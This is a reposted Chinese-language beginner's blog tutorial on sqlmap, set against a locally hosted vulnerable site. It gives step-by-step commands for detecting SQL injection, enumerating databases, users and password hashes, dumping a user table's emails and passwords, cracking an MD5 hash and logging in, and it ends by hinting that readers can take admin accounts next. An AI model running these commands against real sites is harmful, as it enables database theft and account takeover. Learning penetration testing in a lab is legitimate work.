滲透測試工具sqlmap基礎教程 - ⎝⎛CodingNote.cc ⎞⎠

滲透測試工具sqlmap基礎教程

2019 年 10 月 6 日
筆記

轉載請註明出處：http://blog.csdn.net/zgyulongfei/article/details/41017493

作者：羽龍飛

本文僅獻給想學習滲透測試的sqlmap小白，大牛請繞過。

>

>

對於網絡安全人員來說，掌握滲透工具的使用方法是一項必備的技能。然而，一個沒有師傅帶領的小白在剛開始學習時，並不知道該如何入手進行滲透學習，所以本文旨在幫助這些小白入門。

sqlmap是一款非常強大的開源sql自動化注入工具，可以用來檢測和利用sql注入漏洞。它由python語言開發而成，因此運行需要安裝python環境。

既然本文是基礎教程，以下只寫工具的基本使用方法。

本教程為sqlmap具體應用案例，如需了解更多sqlmap資料可以訪問官方http://sqlmap.org ，或者烏雲知識庫http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。

測試環境：本地搭建的具有sql注入點的網站 http://192.168.1.150

注意：sqlmap只是用來檢測和利用sql注入點的，並不能掃描出網站有哪些漏洞，使用前請先使用掃描工具掃出sql注入點。

教程開始：

一、檢測注入點是否可用

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

參數：

-u：指定注入點url

結果：

注入結果展示：

（1）注入參數id為GET注入，注入類型有四種分別為：boolean-based blind、error-based、stacked queries、inline query。

（2）web服務器系統為windows 2003 or XP

（3）web應用程序技術為：ASP.NET, Microsoft IIS 6.0

（4）數據庫類型為：SQLSERVER 2000

其中圖一有若干詢問語句，需要用戶輸入[Y/N]，如果你懶得輸入或者不懂怎麼輸入可以讓程序自動輸入，只需添加一個參數即可，命令如下：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" –batch

二、暴庫

一條命令即可曝出該sqlserver中所有數據庫名稱，命令如下：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" –dbs

參數：

–dbs：dbs前面有兩條杠，請看清楚。

結果：

結果顯示該sqlserver中共包含7個可用的數據庫。

三、web當前使用的數據庫

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" –current-db

四、web數據庫使用賬戶

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" –current-user

五、列出sqlserver所有用戶

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" –users

六、數據庫賬戶與密碼

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" –passwords

七、列出數據庫中的表

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata –tables

參數：

-D：指定數據庫名稱

–tables：列出表

結果：

結果體現共列出了34張表。

八、列出表中字段

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb –columns

參數：

-D：指定數據庫名稱

-T：指定要列出字段的表

–columns：指定列出字段

結果：

結果顯示該userb表中包含了23條字段。

九、暴字段內容

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" –dump

參數：

-C ：指定要暴的字段

–dump：將結果導出

結果：

如果字段內容太多，需要花費很多時間。可以指定導出特定範圍的字段內容，命令如下：

C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" –start 1 –stop 10 –dump

參數：

–start：指定開始的行

–stop：指定結束的行

此條命令的含義為：導出數據庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數據內容。

結果如下：

十、驗證結果

通過上圖結果看到其中的一個用戶信息為：

email：[email protected]

username: 1.asp

password: 49ba59abbe56e057

通過md5解密，得到該hash的原文密碼為：123456

拿到賬號密碼我們來測試是否可以登錄，登錄結果如下：

驗證成功！

當然我們只是拿到普通會員賬號進行登錄，你也可以拿到管理員賬號進行登錄，後面的事情自己發揮吧，嘿嘿！

———————

Previous post

安全測試——利用Burpsuite密碼爆破（Intruder入侵）

Next post

scrapy爬蟲框架教程（二）– 爬取豆瓣電影